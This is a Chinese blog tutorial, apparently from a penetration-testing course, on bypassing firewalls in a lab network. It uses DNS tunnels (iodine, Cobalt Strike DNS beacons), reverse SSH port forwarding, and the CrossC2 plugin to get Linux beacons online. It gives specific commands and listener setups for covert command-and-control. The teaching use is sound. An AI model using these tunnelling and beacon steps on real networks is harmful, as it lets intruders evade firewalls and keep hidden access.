隧道技术和代理技术(四)SSH&DNS&ICMP&SMB&上线通讯

最新推荐文章于 2024-05-20 17:06:32 发布
最新推荐文章于 2024-05-20 17:06:32 发布
阅读量1.2k 收藏 20
点赞数 12
文章标签: ssh 运维 网络安全 android linux html 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/137027584
版权

目录

SSH&DNS&ICMP&SMB&上线通讯

DNS 隧道上线

DNS 隧道通讯

SSH 隧道通讯

SSH 隧道上线

SSH&DNS&ICMP&SMB&上线通讯

-连接方向:正向&反向(基础课程有讲过)

-内网穿透:解决网络控制上线&网络通讯问题

-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

icmp协议可以通过ping命令判断

SMB 隧道可以通过445 端口是否占用来判断

DNS 隧道可以通过nslookup dig命令来判断

测试ICMP协议过程演示

首先找一个win7,对其防火墙的高级->入站规则进行新建规则

我命名为tcp all

协议是tcp,端口是所有端口

image-20240318204400797

网络是所有网络

此时该靶机是可以ping通百度的

image-20240318204536015

但是没办法访问

image-20240318204651015

因为ping命令的数据走向的icmp命令,如果可以ping通,说明开icmp协议通道,在上一篇文章介绍了就不多说了

DNS解析测试演示

nslookup www.baidu.coom

image-20240318210236502

有同学会问,tcp都封了为什么还可以nslookup 解析DNS呢?

因为DNS在区域传输的时候用的是tcp,域名解析是udp,因此可以nslookup

image-20240318210753644

那为什么不能访问网站呢?

是因为www.baidu.com一开始解析是使用udp,但是打开页面的时候是区域传输使用的是tcp

DNS 隧道上线

用上面第的靶机上线,一般情况下,tcp全部封杀,是无法直接上线的

首先需要一台1服务器

还要有一个域名

现在到解析设置,配置一下域名cs,ns1,ns2

image-20240319220437955

主要的解析顺序是

访问ns1.swq111.online/ns2.swq111.online解析到->cs.swq111.online解析到->服务器ip

接下来配置监听器,具体含义是解析的域名是ns1.swq111.online/ns2.swq111.online,解析到cs.swq111.online,然后还原到ip地址

image-20240320205043780

接下来生成后门

image-20240319222252325

VPS防火墙(安全组)开放DUP端口53,

注意:DNS paylod默认使用53端口,所以一定要把vps的53端口kill掉,端口占用是不会上线的。

查看53端口是否占用,lsof -i:53

靶机运行木马,CS实现上线,会话交互输入mode dns-txt,即可上线

image-20240320212206967

image-20240320212303502

DNS 隧道通讯

image-20240320212430256

可以看上面的图片,外网服务器和内网靶机之间有一个只允许DNS通讯的防火墙,一般情况下只能外网访问外网,外网不能访问内网,如果在此之间配置两个虚拟网卡,就能完成通讯

工具下载

Releases · yarrick/iodine (github.com)

安装教程

执行make命令以编译服务端和客户端二进制文件。运行make install以将二进制文件复制到目标目录。运行make test以编译并运行单元测试。

image-20240323174538632

image-20240323174608338

在bin目录下,有iodine和iodined两个文件,分别为服务端和客户端。

-服务器:设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向

iodined -f -c -P swq123 192.168.0.1 ns1.swq111.online -DD

设置密码 swq123 并创建虚拟 IP 及绑定域名指向

image-20240323174659924

-客户端:连接密码 swq123 并绑定域名指向

iodine -f -M 200 -P swq123 ns1.swq111.online

-尝试通讯尝试连接:

ssh root@192.168.0.2

就可以通讯了(靶机是kali)

image-20240323210932369

SSH 隧道通讯

image-20240323212840718

由于 CS 无 SSH 协议监听器配置,无法上线

由于外网没办法访问内网靶机,只能内网靶机出网进行反向连接

因为防火墙只让ssh协议通过,所有使用linux做跳板机,来将windous的web服务,通过ssh协议转发到外网服务器,实现内网探针

操作

首先在内网win10靶机上开启web服务,可以使用phpstudy,创建一个页面

image-20240325153947779

然后通过内网linux靶机访问,看内网是否通讯

image-20240325154040935

在内网linux靶机上执行下面命令,然后输入外网服务器的ssh的连接密码

ssh -CfNg -R 1234:192.168.23.131:80 root@0.0.0.0

0.0.0.0换成外网服务器的ip

192.168.23.131是内网win10靶机的ip

这个命令的意思是吧内网的web服务通过linux的ssh发到外网服务器的1234端口上

image-20240325154441385

到外网服务器上执行

curl 127.0.0.1:1234

访问内网靶机,成功

image-20240325154630567

SSH 隧道上线

首先要给cs安装插件,因为原生cs只有exe文件,linux上不了

所以要用cs插件上线CrossC2

Releases · gloxec/CrossC2 · GitHub

下载liunx版本的下面三个文件

image-20240325174943006

然后加载刚刚下载的和CrossC2kit下的cna文件

image-20240325175043706

image-20240325175124169

将linux文件上传到vps的cs目录下

image-20240325180614230

CrossC2-GithubBot-2-23-03-27.cna用记事本打开,修改$CC2_PATH和$CC2_BIN路径,改为cs服务端genCrossC2.Linux的路径

image-20240325202437765

回到cs界面上面会多出来crossc2,使用https

image-20240325180031984

配置监听器就行,系统选linux,其他默认就好

image-20240325180756383

然后会在事假日志出现下面字符命令,复制到vps的cs目录下运行

image-20240325220126934

生成.out文件,复制到kali上加权,运行,即可上线

image-20240325220302396

小小邵同学
关注
  • 12
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssh连接如何使用代理
欢迎来到小迪的CSDN博客!
05-08 1万+
前言 我最近将公司电脑系统换成deepin了,感觉体验不错。 没了windows之后如何登录腾讯云呢?以前还有个xshell或者mobaXterm可以设置代理,现在要通过命令行登录了。 网上用ssh隧道来翻墙的教程比较多,通过代理连接ssh的文章相对较少,这种方法适用于网络中防火墙屏蔽了ssh协议,或者其它原因无法通过ssh直连服务器的情况。配置好后ssh流量会通过指定的代理中转,从而突破防...
【动力节点】SSH&SSM;框架讲义加SSM视频
11-26
北京动力节点SSH&SSM;框架讲义加SSM视频 (绝对详细完整版)
ssh 代理详细解释
weixin_34080571的博客
06-29 652
ssh 代理详细解释 ssh -qTfnN -D 7070 ape@192.168.1.35 ssh -CfNg -R 1521:127.0.0.1:80 ape@192.168.1.35 参考地址: http://hi.baidu.com/edeed/item/e393cf34a76eb8f3e7bb7ab8 http://hi.baidu.com/step_1/blog/item/2...
# SSH端口转发之上网代理、正向代理、反向代理用法
最新发布
超级无敌棒棒糖
05-20 593
上网代理(动态端口转发)可用于代理上网(socks)正向代理(本地端口转发)与反向代理(远程端口转发)都是端口到端口的转发,一般用于解决网络安全、网络防火墙限制、NAT等问题。
ssh代理
a807719447的专栏
03-29 7290
ssh功能还是很强大的,提供了三种代理功能 -L参数,正向代理 -R参数,反向代理 -D参数,socks5代理 说的通俗易懂点就是我有 hostA,hostB,hostC #mermaid-svg-o500HVE8uv90TAF7 {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-o500HVE8uv90TAF7 .error-icon{fill:#552222;}#me
ssh代理服务器
qq_42186444的博客
03-26 2710
1.SSH动态绑定 这是SSHfq的基本原理:利用SSH动态绑定的功能。那么何谓SSH动态绑定呢?动态绑定是SSH端口转发功能的一种形式,借用一张图: 首先,墙内的客户机跟墙外的代理服务器,建立好SSH连接,并设定动态绑定 此时墙内客户机上的SSH会监听本地的一个端口7001 客户机上的程序,将对www.youtube.com:80的请求告知7001端口的SSHSSH将此请求通过SSH加密连接发送到墙外服务器SSH上 由于建立的动态绑定,服务器会将www.youtube.com:80的请求发送给www
 基于SSH2框架与ExtJS技术的权限管理模块的设计与实现
01-30
并且以进销存管理平台的权限管理系统为切入点对系统运用的ExtJS技术SSH2框架进行分析,在系统分析设计中展示ExtJS多级动态树结构如何在权限管理系统中应用并实现Ajax技术的异步加载树节点功能,并因此提高权限管理...
安卓命令行APP & juice SSH.zip
04-16
总结来说,安卓命令行APP与juice SSH是安卓用户进行远程控制和管理的强大工具,它们将复杂的命令行操作和安全的SSH连接集成到小巧的手机应用中,使得移动办公变得更加灵活和高效。无论是在外出差还是在家办公,只要...
 基于SSH架构的园林招投标管理系统的设计与实现
01-30
为了实现园林招投标管理系统的高效开发,并使该系统具有更好的易维护性和可扩展性需求,提出了一种基于现有开源SSH(Struts Spring Hibernate) 架构技术,以My Eclipse为平台进行开发。实践表明采用该技术使系统...
 实验选修课程预约系统的设计与实现
01-30
加强实践教学是当前高等教育改革的主要课题, 本文在用户需求分析的基础上, 基于 Web 技术设计了符合高等院校实践教学管理特点的实验选修课程预约系统。本系统基于JavaEE平台开发,开发环境为JDK1.6,系统使用了...
了解ssh代理ssh-agent
他很懒,什么也没留下
09-14 1112
转载自了解ssh代理ssh-agent | 朱双印博客 了解ssh代理ssh-agent ssh代理是一个程序,它可以帮助我们管理私钥,ssh-agent即为ssh代理程序。 那么什么时候需要ssh代理帮助我们管理私钥呢?当遇到如下情况时,我们会需要ssh代理。 1、使用不同的密钥连接到不同的主机时,需要手动指定对应的密钥,ssh代理可以帮助我们选择对应的密钥进行认证,不用手动指定密钥即可进行连接。 2、当私钥设置了密码,我们又需要频繁的使用私钥进行认证时,ssh代理可以帮助我们免去重复的输入密码的操作
ssh 代理(A主机通过B主机上网)
WillPower
11-11 4496
假定场景如下: A主机不能够上网,B主机能够上网,A、B主机能够通过SSH进行访问,现在的要求是A主机要能够访问网页,应用程序也能够上网,并且可以下载东西 SSH连接 通过SSH的 -D 参数我们可以设置代理 在A主机终端输入 其中 username: B主机上一个用户名 ip: B主机的ip ssh -D 127.0.0.1:1080 username@ip apt下载tsocks 这个也可以提前在A主机上面下载好,这里给的是用apt的代理方式安装tsocks 参考链接 sudo apt-get -o A
SSH代理设置
烟囱囱
07-06 524
在 A 机器上做到 B 机器的反向代理;在 B 机器上做正向代理本地端口转发。:提供B->A的转发。:提供C->B的转发。从 C 机器使用 SSH 访问 A。A 服务器局域网中的某台设备。B 服务器局域网的出口设备。
SSH 服务详解 (三)-- 使用 SSH 代理
tyustli
01-12 8919
使用 SSH 代理
ssh 代理设置
bdss58的专栏
12-05 2073
1. 直接指定命令参数 - o 指定 ProxyCommand 。可以通过 ProxyCommand 告诉 ssh client 如何与代理进行通讯,通过代理与运程主机建立 ssh 链接。 ssh -p 36000 -o "ProxyCommand corkscrew 127.0.0.1 12759 %h %p" -o "ControlMaster auto" -o "ControlPath ~...
ssh设置网络代理
Dao_pin的博客
07-06 1278
linux网络代理
ssh代理的解释
whojoe的博客
05-02 866
ssh的三种代理用法SSH 命令的三种代理功能(-L/-R/-D)正向代理反向代理ssh socks 代理(端口转发) SSH 命令的三种代理功能(-L/-R/-D) ssh 命令除了登陆外还有三种代理功能: 可以说是ssh可以用来端口转发 正向代理(-L):相当于 iptable 的 port forwarding 反向代理(-R):相当于 frp 或者 ngrok ssh socks代理(-D...
ssh动态代理配置(Tunnel)
juong的博客
11-09 3355
ssh动态代理配置
华为S2750&S5700&S6700交换机V200R003网络管理配置手册
"该文档是华为技术有限公司针对S2750、S5700、S6700系列以太网交换机在V200R003(C00&C02&C10)版本的网络管理配置指南。内容涵盖了这些设备在网络管理方面的基本概念、配置步骤和实例,旨在帮助数据配置、调测、网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值